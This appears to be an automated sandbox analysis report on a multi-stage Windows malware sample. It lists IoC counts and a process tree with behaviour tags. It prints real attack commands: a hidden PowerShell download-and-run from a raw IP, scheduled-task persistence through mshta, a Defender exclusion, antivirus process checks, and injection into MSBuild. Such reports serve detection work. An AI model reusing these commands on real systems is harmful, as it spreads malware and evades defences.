Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5488 powershell.exe Token: SeDebugPrivilege 4932 1Hoz3Kt.exe Token: SeDebugPrivilege 2204 MSBuild.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeIncreaseQuotaPrivilege 4016 powershell.exe Token: SeSecurityPrivilege 4016 powershell.exe Token: SeTakeOwnershipPrivilege 4016 powershell.exe Token: SeLoadDriverPrivilege 4016 powershell.exe Token: SeSystemProfilePrivilege 4016 powershell.exe Token: SeSystemtimePrivilege 4016 powershell.exe Token: SeProfSingleProcessPrivilege 4016 powershell.exe Token: SeIncBasePriorityPrivilege 4016 powershell.exe Token: SeCreatePagefilePrivilege 4016 powershell.exe Token: SeBackupPrivilege 4016 powershell.exe Token: SeRestorePrivilege 4016 powershell.exe Token: SeShutdownPrivilege 4016 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeSystemEnvironmentPrivilege 4016 powershell.exe Token: SeRemoteShutdownPrivilege 4016 powershell.exe Token: SeUndockPrivilege 4016 powershell.exe Token: SeManageVolumePrivilege 4016 powershell.exe Token: 33 4016 powershell.exe Token: 34 4016 powershell.exe Token: 35 4016 powershell.exe Token: 36 4016 powershell.exe Token: SeDebugPrivilege 1612 PowerShell.exe Token: SeIncreaseQuotaPrivilege 1612 PowerShell.exe Token: SeSecurityPrivilege 1612 PowerShell.exe Token: SeTakeOwnershipPrivilege 1612 PowerShell.exe Token: SeLoadDriverPrivilege 1612 PowerShell.exe Token: SeSystemProfilePrivilege 1612 PowerShell.exe Token: SeSystemtimePrivilege 1612 PowerShell.exe Token: SeProfSingleProcessPrivilege 1612 PowerShell.exe Token: SeIncBasePriorityPrivilege 1612 PowerShell.exe Token: SeCreatePagefilePrivilege 1612 PowerShell.exe Token: SeBackupPrivilege 1612 PowerShell.exe Token: SeRestorePrivilege 1612 PowerShell.exe Token: SeShutdownPrivilege 1612 PowerShell.exe Token: SeDebugPrivilege 1612 PowerShell.exe Token: SeSystemEnvironmentPrivilege 1612 PowerShell.exe Token: SeRemoteShutdownPrivilege 1612 PowerShell.exe Token: SeUndockPrivilege 1612 PowerShell.exe Token: SeManageVolumePrivilege 1612 PowerShell.exe Token: 33 1612 PowerShell.exe Token: 34 1612 PowerShell.exe Token: 35 1612 PowerShell.exe Token: 36 1612 PowerShell.exe Token: SeIncreaseQuotaPrivilege 1612 PowerShell.exe Token: SeSecurityPrivilege 1612 PowerShell.exe Token: SeTakeOwnershipPrivilege 1612 PowerShell.exe Token: SeLoadDriverPrivilege 1612 PowerShell.exe Token: SeSystemProfilePrivilege 1612 PowerShell.exe Token: SeSystemtimePrivilege 1612 PowerShell.exe Token: SeProfSingleProcessPrivilege 1612 PowerShell.exe Token: SeIncBasePriorityPrivilege 1612 PowerShell.exe Token: SeCreatePagefilePrivilege 1612 PowerShell.exe Token: SeBackupPrivilege 1612 PowerShell.exe Token: SeRestorePrivilege 1612 PowerShell.exe Token: SeShutdownPrivilege 1612 PowerShell.exe Token: SeDebugPrivilege 1612 PowerShell.exe Token: SeSystemEnvironmentPrivilege 1612 PowerShell.exe Token: SeRemoteShutdownPrivilege 1612 PowerShell.exe Token: SeUndockPrivilege 1612 PowerShell.exe Token: SeManageVolumePrivilege 1612 PowerShell.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4400 Bell_Setup16.tmp 5440 Constraints.com 5440 Constraints.com 5440 Constraints.com 7656 Passwords.com 7656 Passwords.com 7656 Passwords.com -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5440 Constraints.com 5440 Constraints.com 5440 Constraints.com 7656 Passwords.com 7656 Passwords.com 7656 Passwords.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5788 wrote to memory of 4920 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 5788 wrote to memory of 4920 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 5788 wrote to memory of 4920 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 5788 wrote to memory of 224 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5788 wrote to memory of 224 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5788 wrote to memory of 224 5788 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4920 wrote to memory of 4344 4920 cmd.exe 88 PID 4920 wrote to memory of 4344 4920 cmd.exe 88 PID 4920 wrote to memory of 4344 4920 cmd.exe 88 PID 224 wrote to memory of 5488 224 mshta.exe 92 PID 224 wrote to memory of 5488 224 mshta.exe 92 PID 224 wrote to memory of 5488 224 mshta.exe 92 PID 5488 wrote to memory of 1528 5488 powershell.exe 99 PID 5488 wrote to memory of 1528 5488 powershell.exe 99 PID 5488 wrote to memory of 1528 5488 powershell.exe 99 PID 1528 wrote to memory of 5580 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 100 PID 1528 wrote to memory of 5580 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 100 PID 1528 wrote to memory of 5580 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 100 PID 5580 wrote to memory of 5216 5580 rapes.exe 104 PID 5580 wrote to memory of 5216 5580 rapes.exe 104 PID 5580 wrote to memory of 5216 5580 rapes.exe 104 PID 5216 wrote to memory of 4196 5216 18f71bf7e7.exe 107 PID 5216 wrote to memory of 4196 5216 18f71bf7e7.exe 107 PID 5216 wrote to memory of 4196 5216 18f71bf7e7.exe 107 PID 4724 wrote to memory of 2456 4724 cmd.exe 108 PID 4724 wrote to memory of 2456 4724 cmd.exe 108 PID 5216 wrote to memory of 5752 5216 18f71bf7e7.exe 109 PID 5216 wrote to memory of 5752 5216 18f71bf7e7.exe 109 PID 5216 wrote to memory of 5752 5216 18f71bf7e7.exe 109 PID 5580 wrote to memory of 4016 5580 rapes.exe 110 PID 5580 wrote to memory of 4016 5580 rapes.exe 110 PID 5580 wrote to memory of 4016 5580 rapes.exe 110 PID 4016 wrote to memory of 5928 4016 amnew.exe 111 PID 4016 wrote to memory of 5928 4016 amnew.exe 111 PID 4016 wrote to memory of 5928 4016 amnew.exe 111 PID 5580 wrote to memory of 4932 5580 rapes.exe 112 PID 5580 wrote to memory of 4932 5580 rapes.exe 112 PID 5580 wrote to memory of 4932 5580 rapes.exe 112 PID 5928 wrote to memory of 1584 5928 futors.exe 113 PID 5928 wrote to memory of 1584 5928 futors.exe 113 PID 1584 wrote to memory of 5460 1584 v7942.exe 114 PID 1584 wrote to memory of 5460 1584 v7942.exe 114 PID 1584 wrote to memory of 5460 1584 v7942.exe 114 PID 5580 wrote to memory of 3976 5580 rapes.exe 118 PID 5580 wrote to memory of 3976 5580 rapes.exe 118 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 3976 wrote to memory of 2204 3976 ZzvSz9G.exe 119 PID 2204 wrote to memory of 4452 2204 MSBuild.exe 120 PID 2204 wrote to memory of 4452 2204 MSBuild.exe 120 PID 2204 wrote to memory of 4452 2204 MSBuild.exe 120 PID 3228 wrote to memory of 5492 3228 cmd.exe 124 PID 3228 wrote to memory of 5492 3228 cmd.exe 124 PID 3228 wrote to memory of 5492 3228 cmd.exe 124 PID 5928 wrote to memory of 4440 5928 futors.exe 126 PID 5928 wrote to memory of 4440 5928 futors.exe 126 PID 4440 wrote to memory of 4812 4440 alex1dskfmdsf.exe 128 PID 4440 wrote to memory of 4812 4440 alex1dskfmdsf.exe 128 PID 4440 wrote to memory of 4812 4440 alex1dskfmdsf.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2940
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3924
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6924
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn QZ1xFmandLu /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZXkeRmELE.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn QZ1xFmandLu /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZXkeRmELE.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4344
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ZXkeRmELE.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5488 -
C:\Users\Admin\AppData\Local\Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE"C:\Users\Admin\AppData\Local\Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\10394600101\18f71bf7e7.exe"C:\Users\Admin\AppData\Local\Temp\10394600101\18f71bf7e7.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5216 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\10394640101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10394640101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5928 -
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\is-IUNDU.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-IUNDU.tmp\Bell_Setup16.tmp" /SL5="$B027E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:984 -
C:\Users\Admin\AppData\Local\Temp\is-L7805.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-L7805.tmp\Bell_Setup16.tmp" /SL5="$C027E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4400 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4672
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
- Executes dropped EXE
PID:4564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5332
-
-
C:\Users\Admin\AppData\Roaming\BExplorer\bot.exeC:\Users\Admin\AppData\Roaming\BExplorer\bot.exe9⤵
- Executes dropped EXE
PID:5304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5344 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4504 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4672
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046340101\466cf5974c.exe"C:\Users\Admin\AppData\Local\Temp\10046340101\466cf5974c.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat9⤵PID:4556
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:4196
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"10⤵
- System Location Discovery: System Language Discovery
PID:5220
-
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"10⤵
- System Location Discovery: System Language Discovery
PID:1032
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 67418710⤵
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Funky.wbk10⤵PID:3528
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Und" Tournament10⤵PID:3112
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com10⤵
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r10⤵
- System Location Discovery: System Language Discovery
PID:384
-
-
C:\Users\Admin\AppData\Local\Temp\674187\Constraints.comConstraints.com r10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5440
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 510⤵
- System Location Discovery: System Language Discovery
PID:1372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046450101\14c7c5e718.exe"C:\Users\Admin\AppData\Local\Temp\10046450101\14c7c5e718.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10046450101\14c7c5e718.exe"9⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:4184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046460101\44d2247657.exe"C:\Users\Admin\AppData\Local\Temp\10046460101\44d2247657.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10046460101\44d2247657.exe"9⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1124
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe"C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
- System Location Discovery: System Language Discovery
PID:5656
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 4968⤵
- Program crash
PID:1072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe"C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MSBuild" /tr "C:\Users\Admin\AppData\Roaming\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe"C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5960 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10395660101\851cc55f77.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe"C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10395670101\b3b3a25713.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe"C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5524 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5664
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe"C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4536 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵PID:4004
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵PID:8692
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:5824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 4968⤵
- Program crash
PID:7260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395700101\29010300ef.exe"C:\Users\Admin\AppData\Local\Temp\10395700101\29010300ef.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5480 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4696
-
-
